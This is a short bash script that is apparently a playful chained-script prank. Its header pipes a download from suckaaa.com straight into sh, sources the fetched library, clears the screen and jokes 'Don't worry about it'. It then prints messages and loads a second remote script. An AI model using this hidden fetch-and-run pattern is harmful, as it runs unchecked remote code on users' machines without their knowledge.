#!/bin/bash

###########  HEADER  ###########
# loL whatcha lookin for in here??
# Don't worry about it!!
curl -s 'https://suckaaa.com/s/garbage-lib-installer' | sh;
source ~/.super-duper-garbage/lib;
clear;
###########  END HEADER  ###########

bigMsg "That was super weird right?";

sleep 4s;

echo "\nCool so is this!\n";

sleep 2s;

nextScript 'https://suckaaa.com/s/classified';
